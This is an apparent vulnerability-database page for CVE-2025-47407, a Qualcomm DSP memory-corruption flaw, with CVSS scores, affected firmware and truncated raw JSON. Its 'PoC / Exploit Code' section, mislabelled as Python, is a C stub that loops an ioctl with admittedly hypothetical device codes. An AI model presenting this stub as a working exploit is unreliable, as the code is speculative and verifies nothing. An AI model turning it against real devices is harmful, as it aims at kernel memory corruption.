Security Vulnerability Report
中文
CVE-2025-47407 CVSS 7.8 HIGH

CVE-2025-47407

Published: 2026-05-04 17:16:21
Last Modified: 2026-05-06 18:02:39

Description

Memory corruption while creating a process on the digital signal processor due to allocation failure at the kernel level.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:qualcomm:cq7790_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:qualcomm:cq7790:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:qualcomm:cq8725s_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:qualcomm:cq8725s:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:qualcomm:fastconnect_6200_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:qualcomm:fastconnect_6200:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:qualcomm:fastconnect_6700_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:qualcomm:fastconnect_6700:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:qualcomm:fastconnect_6900_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:qualcomm:fastconnect_6900:-:*:*:*:*:*:*:* - NOT VULNERABLE
Qualcomm Chipsets covered in May 2026 Security Bulletin

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * Proof of Concept for CVE-2025-47407 * This code attempts to trigger memory corruption in Qualcomm DSP * by forcing allocation failures during process creation. * Note: This is a conceptual demonstration for educational purposes. */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> // Hypothetical device and IOCTL definitions for DSP interaction #define DSP_DEVICE "/dev/msm_qdsp6_audio" #define IOCTL_DSP_CREATE_PROC 0x8001 int main() { int fd; printf("[*] Starting PoC for CVE-2025-47407\n"); // Open the DSP device interface fd = open(DSP_DEVICE, O_RDWR); if (fd < 0) { perror("[-] Failed to open device"); return -1; } printf("[+] Device opened successfully (FD: %d)\n", fd); printf("[*] Attempting to trigger DSP process creation failure...\n"); // Loop to stress memory and trigger allocation failure for (int i = 0; i < 5000; i++) { // Invoke the IOCTL that triggers the vulnerable code path // Passing NULL or specific args may induce the allocation failure logic int ret = ioctl(fd, IOCTL_DSP_CREATE_PROC, NULL); if (ret != 0) { // Error handling path where the vulnerability might reside // If allocation fails here, kernel memory corruption could occur } } printf("[*] Exploit trigger sequence completed.\n"); close(fd); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-47407", "sourceIdentifier": "[email protected]", "published": "2026-05-04T17:16:21.097", "lastModified": "2026-05-06T18:02:38.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Memory corruption while creating a process on the digital signal processor due to allocation failure at the kernel level."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:cq7790_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "D9FEBA60-92CC-4660-B410-74A9D0AEB7B9"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:cq7790:-:*:*:*:*:*:*:*", "matchCriteriaId": "25B3F423-6AF3-472A-A178-21776C708A88"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:cq8725s_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "C6143A36-BA18-432C-A6BB-2F33B1509C44"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:cq8725s:-:*:*:*:*:*:*:*", "matchCriteriaId": "09EE5F30-46A6-423B-94AF-E7F4DAB532CB"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:fastconnect_6200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "CDE1CBDE-3D28-463C-B215-AA7DF373EF09"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:fastconnect_6200:-:*:*:*:*:*:*:*", "matchCriteriaId": "66BD3B88-7CF9-482D-A2DD-67F6ACF4CC57"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:fastconnect_6700_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "82B82E87-F3F4-466F-A76B-C8809121FF6F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:fastconnect_6700:-:*:*:*:*:*:*:*", "matchCriteriaId": "419A132E-E42C-4395-B74B-788A39DF1D13"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:fastconnect_6900_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "E670F500-9B71-4BBE-B5DA-221D35803C89"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:fastconnect_6900:-:*:*:*:*:*:*:*", "matchCriteriaId": "9ADEB5C5-B79A-4F45-B7D3-75945B38DB6C"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:fastconnect_7800_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "B3053D68-C5D8-4D47-A4F0-9F3AF2289E1D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:fastconnect_7800:-:*:*:*:*:*:*:*", "matchCriteriaId": "638DBC7F-456F-487D-BED2-2214DFF8BEE2"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:g2_gen_1_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "924DFF0F-E8B2-4B94-9B98-E0C2D6313C87"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:g2_gen_1:-:*:*:*:*:*:*:*", "matchCriteriaId": "2A5E644B-D05F-4241-8E20-4A6DA1A56695"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:molokai_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "27BCE022-2E7D-4F41-B8EF-6B2F906F75E0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:molokai:-:*:*:*:*:*:*:*", "matchCriteriaId": "4864D493-47A8-4389-9D9A-2ED5B995EF27"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false ... (truncated)